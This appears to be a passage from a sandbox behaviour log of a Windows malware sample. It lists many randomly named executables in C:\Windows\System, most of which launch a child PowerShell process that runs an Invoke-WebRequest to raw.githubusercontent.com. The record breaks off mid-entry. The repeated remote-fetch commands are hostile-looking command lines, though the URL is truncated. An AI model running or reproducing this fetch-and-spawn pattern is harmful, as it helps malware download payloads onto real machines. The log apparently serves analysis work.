C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9488

C:\Windows\System\BBVEoiJ.exe
C:\Windows\System\BBVEoiJ.exe
2⤵
PID:6672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9688

C:\Windows\System\reZIleH.exe
C:\Windows\System\reZIleH.exe
2⤵
PID:6664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9480

C:\Windows\System\FgBmtgG.exe
C:\Windows\System\FgBmtgG.exe
2⤵
PID:6908

C:\Windows\System\tGQhZHi.exe
C:\Windows\System\tGQhZHi.exe
2⤵
PID:6900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11292

C:\Windows\System\uxpsDBF.exe
C:\Windows\System\uxpsDBF.exe
2⤵
PID:6892

C:\Windows\System\Xiizhnj.exe
C:\Windows\System\Xiizhnj.exe
2⤵
PID:6884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11096

C:\Windows\System\aGmutPa.exe
C:\Windows\System\aGmutPa.exe
2⤵
PID:6876

C:\Windows\System\UnzPfkU.exe
C:\Windows\System\UnzPfkU.exe
2⤵
PID:6860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9552

C:\Windows\System\dbZLEqO.exe
C:\Windows\System\dbZLEqO.exe
2⤵
PID:6852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10776

C:\Windows\System\EJoIOzg.exe
C:\Windows\System\EJoIOzg.exe
2⤵
PID:6844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9560

C:\Windows\System\wROIcHV.exe
C:\Windows\System\wROIcHV.exe
2⤵
PID:6836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10944

C:\Windows\System\JrkBxSb.exe
C:\Windows\System\JrkBxSb.exe
2⤵
PID:6656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9704

C:\Windows\System\fogWZtZ.exe
C:\Windows\System\fogWZtZ.exe
2⤵
PID:6648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9472

C:\Windows\System\wNFElLp.exe
C:\Windows\System\wNFElLp.exe
2⤵
PID:6640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9680

C:\Windows\System\mwYbSKP.exe
C:\Windows\System\mwYbSKP.exe
2⤵
PID:6632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9528

C:\Windows\System\zRYSFVQ.exe
C:\Windows\System\zRYSFVQ.exe
2⤵
PID:6624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9592

C:\Windows\System\kDYYsIv.exe
C:\Windows\System\kDYYsIv.exe
2⤵
PID:6948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:8092

C:\Windows\System\oJhgWZR.exe
C:\Windows\System\oJhgWZR.exe
2⤵
PID:7016

C:\Windows\System\CyaNkuz.exe
C:\Windows\System\CyaNkuz.exe
2⤵
PID:7040

C:\Windows\System\KETIOdr.exe
C:\Windows\System\KETIOdr.exe
2⤵
PID:7124

C:\Windows\System\JVSrHke.exe
C:\Windows\System\JVSrHke.exe
2⤵
PID:7172

C:\Windows\System\fqeLOAa.exe
C:\Windows\System\fqeLOAa.exe
2⤵
PID:7188

C:\Windows\System\tptJnuM.exe
C:\Windows\System\tptJnuM.exe
2⤵
PID:7216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11152

C:\Windows\System\BDVEtRw.exe
C:\Windows\System\BDVEtRw.exe
2⤵
PID:7224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11788

C:\Windows\System\KVMEWzl.exe
C:\Windows\System\KVMEWzl.exe
2⤵
PID:7276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9624

C:\Windows\System\fKaiDdX.exe
C:\Windows\System\fKaiDdX.exe
2⤵
PID:7312

C:\Windows\System\QLrJlkB.exe
C:\Windows\System\QLrJlkB.exe
2⤵
PID:7328

C:\Windows\System\rsRSyVy.exe
C:\Windows\System\rsRSyVy.exe
2⤵
PID:7336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11764

C:\Windows\System\IIIlfvs.exe
C:\Windows\System\IIIlfvs.exe
2⤵
PID:7344

C:\Windows\System\Lhvwozb.exe
C:\Windows\System\Lhvwozb.exe
2⤵
PID:7360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11160

C:\Windows\System\lzbQTqu.exe
C:\Windows\System\lzbQTqu.exe
2⤵
PID:7352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11048

C:\Windows\System\gAuzqnG.exe
C:\Windows\System\gAuzqnG.exe
2⤵
PID:7368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11772

C:\Windows\System\yXMITcN.exe
C:\Windows\System\yXMITcN.exe
2⤵
PID:7376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10028

C:\Windows\System\vTyjVAA.exe
C:\Windows\System\vTyjVAA.exe
2⤵
PID:7384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10920

C:\Windows\System\rUyDaim.exe
C:\Windows\System\rUyDaim.exe
2⤵
PID:7392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11244

C:\Windows\System\FumSkeq.exe
C:\Windows\System\FumSkeq.exe
2⤵
PID:7416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9448

C:\Windows\System\PwkpNJk.exe
C:\Windows\System\PwkpNJk.exe
2⤵
PID:7424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9600

C:\Windows\System\kGixfvR.exe
C:\Windows\System\kGixfvR.exe
2⤵
PID:7456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9632

C:\Windows\System\CfUwIrc.exe
C:\Windows\System\CfUwIrc.exe
2⤵
PID:7448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9432

C:\Windows\System\bcEhsvX.exe
C:\Windows\System\bcEhsvX.exe
2⤵
PID:7440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9584

C:\Windows\System\lIXxuDk.exe
C:\Windows\System\lIXxuDk.exe
2⤵
PID:7432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9440

C:\Windows\System\KOPqiBd.exe
C:\Windows\System\KOPqiBd.exe
2⤵
PID:7464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9424

C:\Windows\System\IAuEbDi.exe
C:\Windows\System\IAuEbDi.exe
2⤵
PID:7472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9608

C:\Windows\System\VlauSci.exe
C:\Windows\System\VlauSci.exe
2⤵
PID:7488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9288

C:\Windows\System\GmrXCcQ.exe
C:\Windows\System\GmrXCcQ.exe
2⤵
PID:7480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9416

C:\Windows\System\hpqYeWh.exe
C:\Windows\System\hpqYeWh.exe
2⤵
PID:7496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9408

C:\Windows\System\FRpHazd.exe
C:\Windows\System\FRpHazd.exe
2⤵
PID:7512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9400

C:\Windows\System\RawIBCe.exe
C:\Windows\System\RawIBCe.exe
2⤵
PID:7504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9256

C:\Windows\System\taBckzF.exe
C:\Windows\System\taBckzF.exe
2⤵
PID:7536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11080

C:\Windows\System\pQHHQit.exe
C:\Windows\System\pQHHQit.exe
2⤵
PID:7544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9392

C:\Windows\System\vKXBoye.exe
C:\Windows\System\vKXBoye.exe
2⤵
PID:7560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9384

C:\Windows\System\BRCRPQh.exe
C:\Windows\System\BRCRPQh.exe
2⤵
PID:7552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11072

C:\Windows\System\yucenuo.exe
C:\Windows\System\yucenuo.exe
2⤵
PID:7568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11104

C:\Windows\System\dHeuNLY.exe
C:\Windows\System\dHeuNLY.exe
2⤵
PID:7592

C:\Windows\System\pKABeUZ.exe
C:\Windows\System\pKABeUZ.exe
2⤵
PID:7584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11260

C:\Windows\System\rdpqSwY.exe
C:\Windows\System\rdpqSwY.exe
2⤵
PID:7576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9376

C:\Windows\System\qtmfbHI.exe
C:\Windows\System\qtmfbHI.exe
2⤵
PID:7600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11056

C:\Windows\System\OsgZvAc.exe
C:\Windows\System\OsgZvAc.exe
2⤵
PID:7608

C:\Windows\System\SaAIIXo.exe
C:\Windows\System\SaAIIXo.exe
2⤵
PID:7628

C:\Windows\System\sGJyFMn.exe
C:\Windows\System\sGJyFMn.exe
2⤵
PID:7636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11284

C:\Windows\System\JUCdCZT.exe
C:\Windows\System\JUCdCZT.exe
2⤵
PID:7652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11064

C:\Windows\System\PPgLIlv.exe
C:\Windows\System\PPgLIlv.exe
2⤵
PID:7660

C:\Windows\System\UPInqZt.exe
C:\Windows\System\UPInqZt.exe
2⤵
PID:7644

C:\Windows\System\JLqexsV.exe
C:\Windows\System\JLqexsV.exe
2⤵
PID:7668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10768

C:\Windows\System\AhZrtpn.exe
C:\Windows\System\AhZrtpn.exe
2⤵
PID:7676

C:\Windows\System\MBxOLkR.exe
C:\Windows\System\MBxOLkR.exe
2⤵
PID:7684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11112

C:\Windows\System\khYlArJ.exe
C:\Windows\System\khYlArJ.exe
2⤵
PID:7692

C:\Windows\System\fAJVtof.exe
C:\Windows\System\fAJVtof.exe
2⤵
PID:7708

C:\Windows\System\OiAfcPs.exe
C:\Windows\System\OiAfcPs.exe
2⤵
PID:7724

C:\Windows\System\agYBvZe.exe
C:\Windows\System\agYBvZe.exe
2⤵
PID:7780

C:\Windows\System\hIogGnM.exe
C:\Windows\System\hIogGnM.exe
2⤵
PID:7796

C:\Windows\System\iQplnrz.exe
C:\Windows\System\iQplnrz.exe
2⤵
PID:7788

C:\Windows\System\UPSwJKU.exe
C:\Windows\System\UPSwJKU.exe
2⤵
PID:7772

C:\Windows\System\IgGXqXL.exe
C:\Windows\System\IgGXqXL.exe
2⤵
PID:7764

C:\Windows\System\qmzcANc.exe
C:\Windows\System\qmzcANc.exe
2⤵
PID:7756

C:\Windows\System\akSvjdO.exe
C:\Windows\System\akSvjdO.exe
2⤵
PID:7748

C:\Windows\System\ZmXUQIC.exe
C:\Windows\System\ZmXUQIC.exe
2⤵
PID:7740

C:\Windows\System\NUkSfwj.exe
C:\Windows\System\NUkSfwj.exe
2⤵
PID:7732

C:\Windows\System\NrtUkZU.exe
C:\Windows\System\NrtUkZU.exe
2⤵
PID:7716

C:\Windows\System\jgidPPp.exe
C:\Windows\System\jgidPPp.exe
2⤵
PID:7808

C:\Windows\System\iRXpsjT.exe
C:\Windows\System\iRXpsjT.exe
2⤵
PID:7832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11340

C:\Windows\System\Zeajavf.exe
C:\Windows\System\Zeajavf.exe
2⤵
PID:7856

C:\Windows\System\ZGzMLOJ.exe
C:\Windows\System\ZGzMLOJ.exe
2⤵
PID:7848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11332

C:\Windows\System\QMLpuet.exe
C:\Windows\System\QMLpuet.exe
2⤵
PID:7880

C:\Windows\System\YHBJSQe.exe
C:\Windows\System\YHBJSQe.exe
2⤵
PID:7872

C:\Windows\System\heMgpBC.exe
C:\Windows\System\heMgpBC.exe
2⤵
PID:7864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10928

C:\Windows\System\INiathr.exe
C:\Windows\System\INiathr.exe
2⤵
PID:7840

C:\Windows\System\kjjAqTF.exe
C:\Windows\System\kjjAqTF.exe
2⤵
PID:7824

C:\Windows\System\itVnHGi.exe
C:\Windows\System\itVnHGi.exe
2⤵
PID:7816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11308

C:\Windows\System\RutkzmO.exe
C:\Windows\System\RutkzmO.exe
2⤵
PID:7916

C:\Windows\System\uEAZoUU.exe
C:\Windows\System\uEAZoUU.exe
2⤵
PID:7908

C:\Windows\System\qUHqDhR.exe
C:\Windows\System\qUHqDhR.exe
2⤵
PID:7900

C:\Windows\System\YEUpPgh.exe
C:\Windows\System\YEUpPgh.exe
2⤵
PID:7924

C:\Windows\System\UgcRMlE.exe
C:\Windows\System\UgcRMlE.exe
2⤵
PID:7964

C:\Windows\System\EdZagZm.exe
C:\Windows\System\EdZagZm.exe
2⤵
PID:7956

C:\Windows\System\VKONWCG.exe
C:\Windows\System\VKONWCG.exe
2⤵
PID:7948

C:\Windows\System\gprdoGw.exe
C:\Windows\System\gprdoGw.exe
2⤵
PID:7940

C:\Windows\System\abmfMKI.exe
C:\Windows\System\abmfMKI.exe
2⤵
PID:7932

C:\Windows\System\tRhYvSW.exe
C:\Windows\System\tRhYvSW.exe
2⤵
PID:7972

C:\Windows\System\HSZteBc.exe
C:\Windows\System\HSZteBc.exe
2⤵
PID:7988

C:\Windows\System\TbYXHth.exe
C:\Windows\System\TbYXHth.exe
2⤵
PID:7996

C:\Windows\System\AmPSPiN.exe
C:\Windows\System\AmPSPiN.exe
2⤵
PID:8036

C:\Windows\System\RXAIjUy.exe
C:\Windows\System\RXAIjUy.exe
2⤵
PID:8028

C:\Windows\System\CvkMLCk.exe
C:\Windows\System\CvkMLCk.exe
2⤵
PID:8020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11436

C:\Windows\System\pVeLCSR.exe
C:\Windows\System\pVeLCSR.exe
2⤵
PID:8012

C:\Windows\System\oEpBFAq.exe
C:\Windows\System\oEpBFAq.exe
2⤵
PID:8004

C:\Windows\System\TBEBJHW.exe
C:\Windows\System\TBEBJHW.exe
2⤵
PID:8084

C:\Windows\System\HCUeAeV.exe
C:\Windows\System\HCUeAeV.exe
2⤵
PID:8076

C:\Windows\System\aIYckVd.exe
C:\Windows\System\aIYckVd.exe
2⤵
PID:8068

C:\Windows\System\ZYOyoDL.exe
C:\Windows\System\ZYOyoDL.exe
2⤵
PID:8060

C:\Windows\System\PwOcpaa.exe
C:\Windows\System\PwOcpaa.exe
2⤵
PID:8108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11452

C:\Windows\System\FubButY.exe
C:\Windows\System\FubButY.exe
2⤵
PID:8100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11616

C:\Windows\System\QxVYccJ.exe
C:\Windows\System\QxVYccJ.exe
2⤵
PID:8124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11460

C:\Windows\System\JtWBahn.exe
C:\Windows\System\JtWBahn.exe
2⤵
PID:8160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11120

C:\Windows\System\UYSXqVK.exe
C:\Windows\System\UYSXqVK.exe
2⤵
PID:8152

C:\Windows\System\wqRkoaK.exe
C:\Windows\System\wqRkoaK.exe
2⤵
PID:8140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11476

C:\Windows\System\bmBGyIx.exe
C:\Windows\System\bmBGyIx.exe
2⤵
PID:8132

C:\Windows\System\kkKBEWq.exe
C:\Windows\System\kkKBEWq.exe
2⤵
PID:8116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11040

C:\Windows\System\CBhoHid.exe
C:\Windows\System\CBhoHid.exe
2⤵
PID:8168

C:\Windows\System\ilJPhBF.exe
C:\Windows\System\ilJPhBF.exe
2⤵
PID:8176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11188

C:\Windows\System\CybpidI.exe
C:\Windows\System\CybpidI.exe
2⤵
PID:8184

C:\Windows\System\LpKAdzx.exe
C:\Windows\System\LpKAdzx.exe
2⤵
PID:8212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11252

C:\Windows\System\wAJfBwQ.exe
C:\Windows\System\wAJfBwQ.exe
2⤵
PID:8204

C:\Windows\System\OLywlVt.exe
C:\Windows\System\OLywlVt.exe
2⤵
PID:8196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11128

C:\Windows\System\XWHUiqI.exe
C:\Windows\System\XWHUiqI.exe
2⤵
PID:8220

C:\Windows\System\BCDgZst.exe
C:\Windows\System\BCDgZst.exe
2⤵
PID:8228

C:\Windows\System\maeWPDa.exe
C:\Windows\System\maeWPDa.exe
2⤵
PID:8260

C:\Windows\System\qNaiivn.exe
C:\Windows\System\qNaiivn.exe
2⤵
PID:8252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11196

C:\Windows\System\LqAuYPh.exe
C:\Windows\System\LqAuYPh.exe
2⤵
PID:8236

C:\Windows\System\UTcpnzq.exe
C:\Windows\System\UTcpnzq.exe
2⤵
PID:8284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11276

C:\Windows\System\fwXsOWe.exe
C:\Windows\System\fwXsOWe.exe
2⤵
PID:8316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11144

C:\Windows\System\oOjXzBn.exe
C:\Windows\System\oOjXzBn.exe
2⤵
PID:8308

C:\Windows\System\pXKukVK.exe
C:\Windows\System\pXKukVK.exe
2⤵
PID:8300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10760

C:\Windows\System\GbGpImk.exe
C:\Windows\System\GbGpImk.exe
2⤵
PID:8292

C:\Windows\System\YPuWgSR.exe
C:\Windows\System\YPuWgSR.exe
2⤵
PID:8276

C:\Windows\System\XQndyNd.exe
C:\Windows\System\XQndyNd.exe
2⤵
PID:8268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11136

C:\Windows\System\NGBkfUD.exe
C:\Windows\System\NGBkfUD.exe
2⤵
PID:8332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9240

C:\Windows\System\JPcjISJ.exe
C:\Windows\System\JPcjISJ.exe
2⤵
PID:8392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9360

C:\Windows\System\mbwRosn.exe
C:\Windows\System\mbwRosn.exe
2⤵
PID:8384

C:\Windows\System\UPnvXSD.exe
C:\Windows\System\UPnvXSD.exe
2⤵
PID:8376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9328

C:\Windows\System\eqjLVOX.exe
C:\Windows\System\eqjLVOX.exe
2⤵
PID:8368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9572

C:\Windows\System\rMOOpTh.exe
C:\Windows\System\rMOOpTh.exe
2⤵
PID:8360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9336

C:\Windows\System\xWdYcNT.exe
C:\Windows\System\xWdYcNT.exe
2⤵
PID:8352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9232

C:\Windows\System\lkXMAgl.exe
C:\Windows\System\lkXMAgl.exe
2⤵
PID:8340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9344

C:\Windows\System\IXSmnZW.exe
C:\Windows\System\IXSmnZW.exe
2⤵
PID:8324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9352

C:\Windows\System\WCcviVe.exe
C:\Windows\System\WCcviVe.exe
2⤵
PID:8408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9248

C:\Windows\System\PRImMQc.exe
C:\Windows\System\PRImMQc.exe
2⤵
PID:8424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10952

C:\Windows\System\XNonzEQ.exe
C:\Windows\System\XNonzEQ.exe
2⤵
PID:8448

C:\Windows\System\LdCMvXW.exe
C:\Windows\System\LdCMvXW.exe
2⤵
PID:8432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9312

C:\Windows\System\WzBmrfC.exe
C:\Windows\System\WzBmrfC.exe
2⤵
PID:8416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9320

C:\Windows\System\HTTXgGx.exe
C:\Windows\System\HTTXgGx.exe
2⤵
PID:8480

C:\Windows\System\nyzjFlj.exe
C:\Windows\System\nyzjFlj.exe
2⤵
PID:8472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9368

C:\Windows\System\bKfqvVQ.exe
C:\Windows\System\bKfqvVQ.exe
2⤵
PID:8464

C:\Windows\System\eIPUOHU.exe
C:\Windows\System\eIPUOHU.exe
2⤵
PID:8488

C:\Windows\System\CyeASDa.exe
C:\Windows\System\CyeASDa.exe
2⤵
PID:8556

C:\Windows\System\bYjaoKW.exe
C:\Windows\System\bYjaoKW.exe
2⤵
PID:8548

C:\Windows\System\zHLesAO.exe
C:\Windows\System\zHLesAO.exe
2⤵
PID:8540

C:\Windows\System\MjlSeUq.exe
C:\Windows\System\MjlSeUq.exe
2⤵
PID:8532

C:\Windows\System\teyMEdc.exe
C:\Windows\System\teyMEdc.exe
2⤵
PID:8512

C:\Windows\System\SWoVVPH.exe
C:\Windows\System\SWoVVPH.exe
2⤵
PID:8504

C:\Windows\System\wthCSGG.exe
C:\Windows\System\wthCSGG.exe
2⤵
PID:8496

C:\Windows\System\aGmFbuE.exe
C:\Windows\System\aGmFbuE.exe
2⤵
PID:8564

C:\Windows\System\DpNKuwm.exe
C:\Windows\System\DpNKuwm.exe
2⤵
PID:8572

C:\Windows\System\tsWzWzb.exe
C:\Windows\System\tsWzWzb.exe
2⤵
PID:8624

C:\Windows\System\taqNJsM.exe
C:\Windows\System\taqNJsM.exe
2⤵
PID:8616

C:\Windows\System\JXzjROj.exe
C:\Windows\System\JXzjROj.exe
2⤵
PID:8604

C:\Windows\System\HBcGSWu.exe
C:\Windows\System\HBcGSWu.exe
2⤵
PID:8596

C:\Windows\System\tXLXOwU.exe
C:\Windows\System\tXLXOwU.exe
2⤵
